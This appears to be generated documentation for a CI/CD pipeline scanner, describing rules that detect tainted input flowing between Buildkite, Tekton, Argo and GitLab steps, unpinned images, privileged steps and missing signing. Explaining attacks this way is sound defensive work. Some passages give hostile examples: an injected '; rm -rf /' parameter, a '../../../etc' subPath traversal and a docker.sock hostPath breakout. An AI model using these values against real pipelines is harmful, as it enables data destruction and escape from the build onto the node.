TAINT-005: Untrusted input flows across steps via buildkite-agent meta-data HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection is a two-pass walk over the pipeline. Pass 1 looks for buildkite-agent meta-data set <key> <value> invocations whose <value> interpolates an attacker-controllable Buildkite predefined variable (the same BUILDKITE_* vocabulary BK-003 uses). Pass 2 walks every step for buildkite-agent meta-data get <key> invocations and matches against the producer keys recorded in pass 1.

Buildkite meta-data is per-build, not per-step; any step in the same build can read what any earlier step wrote regardless of depends_on:. The detector doesn't model temporal ordering and fires whenever both a tainted set and a get of the same key exist in the same pipeline file. v1 limitations: meta-data exists (returns 0/1 status) and the --default form aren't tracked; plugins providing their own meta-data abstraction (e.g. cattle-ops/github-merged-pr) aren't introspected.

Recommendation. Sanitise the value at the producer step before it lands in the meta-data store. The canonical safe pattern is to copy the $BUILDKITE_PULL_REQUEST_* / $BUILDKITE_MESSAGE / branch / commit / author source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), and only then call buildkite-agent meta-data set. The consuming step should still reference the $(buildkite-agent meta-data get ...) value quoted ("$TITLE") and never inline into a command without re-quoting. Removing the meta-data flow entirely is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.

Known false positives.

  • If the producer step runs a sanitiser between the tainted source interpolation and the meta-data set call (echo "$BUILDKITE_PULL_REQUEST_TITLE" | tr -dc 'a-zA-Z0-9 ' | xargs -I{} buildkite-agent meta-data set title {}), the consumer is no longer exploitable but TAINT-005 still fires. Suppress via ignore-file scoped to the consumer step's pipeline file when this is the deliberate shape; the sanitiser is then load-bearing and any future regression in it would re-expose the consumer.

Source: TAINT-005 in the Buildkite provider.

TAINT-006: Untrusted input flows across tasks via Tekton results HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every Pipeline document. Pass 1 looks for tasks whose body's steps[*].script writes to $(results.<X>.path) AND interpolates a $(params.<Y>) reference, recording X as a tainted result for that producer task. Pass 2 walks every task for params: whose value: is $(tasks.<producer>.results.<X>). When (producer, X) matches a tainted result and the consumer's body's steps[*].script references $(params.<consumer-name>) (where consumer-name is the param the result was forwarded into), TAINT-006 fires.

Body resolution: inline taskSpec: blocks are walked directly; taskRef: { name: <X> } references resolve against Task / ClusterTask documents loaded into the same scan, so a Pipeline that splits the producer / consumer task definitions into separate files still trips the rule. bundle: and resolver: (remote OCI / Tekton-resolver-framework references) aren't followed; they require network fetches the scanner deliberately avoids. finally: blocks aren't walked yet.

Recommendation. Sanitise the value at the producer task before it lands in $(results.<name>.path). The canonical safe pattern is to copy the $(params.<name>) source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' for a freeform title), and only then write the cleaned value to the result file. The consumer task should still treat its own param as tainted: surface $(params.<name>) into a quoted shell variable (TITLE="$(params.title)") before interpolating elsewhere. Removing the cross-task results forwarding is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.

Known false positives.

  • If the producer task runs a sanitiser between the tainted $(params.X) interpolation and the $(results.Y.path) write, the consumer is no longer exploitable but TAINT-006 still fires. Suppress via ignore-file scoped to the consumer task name when this is the deliberate shape; the sanitiser is then load-bearing.

Source: TAINT-006 in the Tekton provider.

TAINT-007: Untrusted input flows across templates via Argo outputs.parameters HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every workflow document with spec.templates. Pass 1 looks for templates that declare outputs.parameters AND whose inline script.source interpolates {{inputs.parameters.<X>}}, recording the template's outputs as tainted. Pass 2 walks each template's DAG / Steps orchestrator for tasks whose arguments.parameters[*].value is {{tasks.<producer>.outputs.parameters.<X>}} matching a recorded leak. Pass 3 walks the consumer task's referenced template for the matching {{inputs.parameters.<consumer-param>}} reference in its script body and emits one path per match.

v1 limitations: workflowTemplateRef: cross-document references aren't resolved (would need the same machinery as the GHA --resolve-remote flow). onExit: exit handlers aren't yet walked.

Recommendation. Sanitise the value at the producer template before it lands in an output parameter. The canonical safe pattern is to surface {{inputs.parameters.<X>}} into a quoted shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' for a freeform title), and only then redirect the cleaned value to the output path. The consumer template should still reference {{inputs.parameters.<name>}} quoted ("{{inputs.parameters.title}}") and never inline into a command without re-quoting. Removing the cross-template forwarding is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.

Known false positives.

  • If the producer template runs a sanitiser between the tainted {{inputs.parameters.X}} interpolation and the output-path write, the consumer is no longer exploitable but TAINT-007 still fires. Suppress via ignore-file scoped to the consumer template name when this is the deliberate shape; the sanitiser is then load-bearing.

Source: TAINT-007 in the Argo Workflows provider.

TAINT-008: Untrusted input flows via GitLab extends: template inheritance HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Two-pass walk over the pipeline doc. Pass 1 builds a universe of every job-shaped entry (hidden templates included, top-level keywords excluded), resolves each non-hidden job's extends: chain transitively, and gathers tainted variables (any $CI_COMMIT_* / $CI_MERGE_REQUEST_* interpolation in the link's variables: block). Pass 2 walks the consuming job's before_script: / script: / after_script: for unquoted $<name> references matching an inherited tainted variable. Cycles in the extends chain are broken via a visited set; unresolvable extends entries are silently dropped.

v1 limitations: include: cross-pipeline file inclusion isn't tracked yet (would need cross-document analysis like the GHA --resolve-remote flow). extends: chains that pull templates from include-d files are partial: in-doc links resolve, external links are treated as missing.

Recommendation. Move the tainted-source interpolation out of the template's variables: block. The canonical safe pattern is to receive the source value through $CI_* directly in the consuming job's script (or a dedicated sanitiser step) and never copy it into a shared variable a downstream job can interpolate unquoted. If the inheritance is genuinely needed, sanitise at the boundary (TITLE_SAFE: '$(echo "$CI_COMMIT_TITLE" | tr -dc "a-zA-Z0-9 ")') and have the extending job reference the cleaned variable. Removing the extends: propagation is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.

Known false positives.

  • If the consuming job sanitises the inherited variable before referencing it (CLEAN=$(echo "$TITLE" | tr -dc 'a-zA-Z0-9 '); echo $CLEAN), the rule still fires on the original $TITLE reference even though the sanitised value is what reaches the shell. Suppress via ignore-file scoped to the consuming job's name when the sanitiser is audited and load-bearing.

Source: TAINT-008 in the GitLab CI provider.

TF-001: aws_iam_access_key declares a long-lived access key CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-001 in the Terraform provider.

TF-002: Resource attribute carries a hard-coded secret shape CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-002 in the Terraform provider.

TF-003: CodeBuild VPC shares its VPC with a public subnet HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. See Terraform provider documentation for the rule's detection mechanism.

Recommendation. See Terraform provider documentation for the recommended remediation.

Source: TF-003 in the Terraform provider.

TKN-001: Tekton step image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.

Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the step at the next pull, with no audit trail in the Task manifest.

Source: TKN-001 in the Tekton provider.

TKN-002: Tekton step runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.

Source: TKN-002 in the Tekton provider.

TKN-003: Tekton param interpolated unsafely in step script CRITICAL

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.

Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.

Source: TKN-003 in the Tekton provider.

TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.

Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.

Source: TKN-004 in the Tekton provider.

TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.

Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: TKN-005 in the Tekton provider.

TKN-006: Tekton run lacks an explicit timeout LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout, the timeout lives on the concrete run.

Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.

Source: TKN-006 in the Tekton provider.

TKN-007: Tekton run uses the default ServiceAccount MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. An explicit serviceAccountName: default setting is treated the same as omission.

Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.

Source: TKN-007 in the Tekton provider.

TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.

Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: TKN-008 in the Tekton provider.

TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Tasks don't trip it.

Recommendation. Add a signing step to the Task, either a dedicated cosign sign step after the build, or use the official cosign Tekton catalog Task as a referenced step. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.

Source: TKN-009 in the Tekton provider.

TKN-010: No SBOM generated for build artifacts MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.

Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.

Source: TKN-010 in the Tekton provider.

TKN-011: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer, once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.

Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.

Source: TKN-011 in the Tekton provider.

TKN-012: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.

Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.

Source: TKN-012 in the Tekton provider.

TKN-013: Tekton sidecar runs privileged or as root HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. TKN-002 hardens the spec.steps list. Tekton's spec.sidecars list runs alongside the steps in the same pod, but a sidecar's container image and command come from a separate place in the manifest, so a Task with hardened steps and a privileged sidecar (a common pattern when wrapping docker:dind) leaves the same kernel-namespace gap TKN-002 was meant to close. The detection mirrors TKN-002: fires on a sidecar with securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all.

Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every sidecar in spec.sidecars. A privileged sidecar is the same escape vector as a privileged step, it shares the pod's network and kernel namespaces, and a compromised sidecar image owns the entire TaskRun's execution surface.

Known false positives.

  • Tasks that genuinely need docker:dind as a sidecar, e.g. building images inside the cluster without giving the step itself host-Docker access. The replacement pattern is Kaniko or BuildKit running as the step itself, with no privileged sidecar; if neither is viable, ignore TKN-013 in .pipeline-check-ignore.yml for the affected Task.

Source: TKN-013 in the Tekton provider.

TKN-014: Tekton step script runs unpinned package install MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. Same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Drone. Tekton was a gap; this closes it. Only Task and ClusterTask documents are scanned because that's where Tekton step scripts live.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. npm ci (not npm install), yarn install --frozen-lockfile, pip install -r requirements.txt --require-hashes, bundle install --frozen. Don't use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (TKN-008 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step name.

Source: TKN-014 in the Tekton provider.

TKN-015: Workspace subPath interpolates a Task parameter (path traversal) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-5 Insufficient PBAC.

How this is detected. Tekton's $(params.x) substitution is performed on every string field of the resolved TaskRun body, including a step-level workspace binding's subPath. TKN-003 catches the same parameter being interpolated into a step's script body; TKN-015 catches the complementary file-system breakout vector that script-only detection misses, the value never appears in a shell command, only in the volume-mount config.

The detection scans the step-level workspaces: list (spec.steps[*].workspaces[*].subPath) for any $(params.<name>) reference. $(workspaces.x.path) expansions are unaffected because those are not pusher-controlled.

Recommendation. Pin every workspace subPath: to a static literal that your team controls. subPath: build/output is fine; subPath: $(params.target_dir) is not, because a parameter-driven sub-path lets an attacker break out of the workspace and write into a sibling directory of the shared volume. Tekton resolves $(params.x) substitution in workspace bindings before the volume mount happens, so ../../../etc lands as a real path. If you genuinely need a runtime-chosen sub-path, sanitise the parameter with a step-level pre-check (case against an allow-list, reject anything containing ..) and pass the validated value through a result rather than the raw parameter.

Known false positives.

  • Some teams use a parameter to select between a small set of allowed sub-paths and rely on a step pre-check to reject anything off-list. The rule has no way to see that pre-check; suppress on the specific step name when this is the deliberate shape.

Source: TKN-015 in the Tekton provider.


This page is generated. Edit pipeline_check/core/standards/data/owasp_cicd_top_10.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py owasp_cicd_top_10.